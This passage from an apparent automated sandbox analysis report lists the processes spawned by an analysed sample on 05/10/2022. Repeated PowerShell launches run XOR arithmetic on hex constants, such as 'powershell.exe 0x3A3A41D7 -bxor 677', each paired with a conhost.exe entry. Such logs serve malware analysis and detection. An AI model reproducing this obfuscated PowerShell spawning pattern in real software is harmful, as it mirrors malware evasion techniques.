                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:4
                                              Start time:09:26:28
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:5
                                              Start time:09:26:29
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x3A3A41D7 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:6
                                              Start time:09:26:29
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:7
                                              Start time:09:26:32
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x656176C0 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:8
                                              Start time:09:26:32
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:9
                                              Start time:09:26:35
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x46696EC0 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:10
                                              Start time:09:26:35
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:11
                                              Start time:09:26:41
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x41286F85 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:12
                                              Start time:09:26:41
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:14
                                              Start time:09:26:43
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x72342289 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:15
                                              Start time:09:26:43
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:17
                                              Start time:09:26:45
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x20692295 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:18
                                              Start time:09:26:45
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:20
                                              Start time:09:26:47
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x78383295 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:21
                                              Start time:09:26:47
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:23
                                              Start time:09:26:49
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x30303295 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:24
                                              Start time:09:26:49
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:25
                                              Start time:09:26:51
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x302C22CC -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:26
                                              Start time:09:26:51
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:28
                                              Start time:09:26:52
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x20302E85 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:29
                                              Start time:09:26:52
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:30
                                              Start time:09:26:54
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x70203289 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:31
                                              Start time:09:26:54
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:34
                                              Start time:09:26:59
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x20692291 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:35
                                              Start time:09:26:59
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:36
                                              Start time:09:27:01
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x2C206B85 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:37
                                              Start time:09:27:01
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:38
                                              Start time:09:27:03
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x30783A95 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:39
                                              Start time:09:27:03
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:42
                                              Start time:09:27:05
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x2C206B85 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:43
                                              Start time:09:27:05
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:44
                                              Start time:09:27:07
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x30296B8B -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:45
                                              Start time:09:27:07
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:46
                                              Start time:09:27:08
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:powershell.exe 0x723322FC -bxor 677
                                              Imagebase:0x7ff72dbc0000
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:47
                                              Start time:09:27:08
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:48
                                              Start time:09:27:11
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x6B6570CB -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:49
                                              Start time:09:27:11
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:50
                                              Start time:09:27:12
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x656C3197 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:51
                                              Start time:09:27:13
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:52
                                              Start time:09:27:14
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x3A3A54CC -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:53
                                              Start time:09:27:14
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:54
                                              Start time:09:27:16
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x727477C4 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:55
                                              Start time:09:27:16
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:56
                                              Start time:09:27:18
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x6C416EC9 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:57
                                              Start time:09:27:18
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:58
                                              Start time:09:27:20
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x6F632ACC -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:59
                                              Start time:09:27:20
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:60
                                              Start time:09:27:21
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x302C6B85 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:61
                                              Start time:09:27:21
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:62
                                              Start time:09:27:23
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x30783395 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:63
                                              Start time:09:27:23
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:64
                                              Start time:09:27:24
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x30303295 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:65
                                              Start time:09:27:25
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:66
                                              Start time:09:27:26
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x2C206B85 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:67
                                              Start time:09:27:26
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:68
                                              Start time:09:27:28
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x30783195 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:69
                                              Start time:09:27:28
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:70
                                              Start time:09:27:31
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x30302E85 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:71
                                              Start time:09:27:32
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:72
                                              Start time:09:27:34
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x692032DD -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:73
                                              Start time:09:27:34
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:74
                                              Start time:09:27:35
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x34302BD5 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:75
                                              Start time:09:27:36
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:76
                                              Start time:09:27:37
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x2E7233FC -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:77
                                              Start time:09:27:37
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:78
                                              Start time:09:27:39
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
